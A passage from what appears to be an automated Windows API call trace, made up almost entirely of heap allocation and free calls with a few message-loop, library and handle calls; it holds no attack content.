Size=0x10) returned 0x34aa5e0 [0207.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0207.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0207.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0207.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0207.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0207.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0207.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0207.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0207.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0207.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0207.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0207.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0207.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0207.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0207.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0207.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0207.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0207.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0207.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0207.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0207.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0207.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0207.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0207.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0207.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0207.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0207.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0207.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0207.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0207.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0207.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0207.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0207.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0207.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0207.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0207.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0207.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0207.775] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0207.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5e0 [0207.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0207.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0207.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0207.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0207.775] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0207.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0207.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0207.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0207.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0207.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0207.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0207.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0207.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0207.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0207.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0207.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0207.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0207.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0207.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0207.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.776] FreeLibrary (hLibModule=0x74d40000) returned 1 [0207.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0207.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0207.777] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0207.777] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0207.777] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0207.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0207.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0207.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0207.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0207.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0207.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0207.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0207.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0207.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0207.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0207.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0207.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0207.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.778] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0207.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0207.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0207.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0207.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0207.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0207.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0207.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0207.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0207.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0207.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0207.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0207.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0207.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0207.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4c0 [0207.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa898 [0207.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5e0 [0207.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0207.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa760 [0207.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0207.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0207.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa700 [0207.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0207.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0207.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.779] CloseHandle (hObject=0x268) returned 1 [0207.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0207.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0207.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0207.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0207.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0207.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0207.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0207.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0207.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0207.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0207.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0207.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0207.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0207.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0207.781] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0207.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0207.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0207.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0207.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0207.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0207.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0207.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0207.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0207.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0207.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0207.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0207.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0207.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0207.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0207.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0207.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0207.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0207.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0207.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0207.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0207.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0207.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0207.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0207.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0207.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0207.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0207.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0207.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0207.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0207.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0207.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0207.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0207.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0207.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0207.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0207.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0207.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0207.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0207.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0207.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0207.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0207.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0207.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0207.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0207.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0207.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0207.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0207.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0207.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0207.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0207.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0207.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0207.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0207.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0207.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0207.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0207.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0207.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0207.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0207.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0207.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0207.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0207.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0207.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0207.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0207.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0207.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0207.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0207.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0207.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0207.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0207.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0207.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0207.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0207.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0207.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0207.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0207.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0207.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: 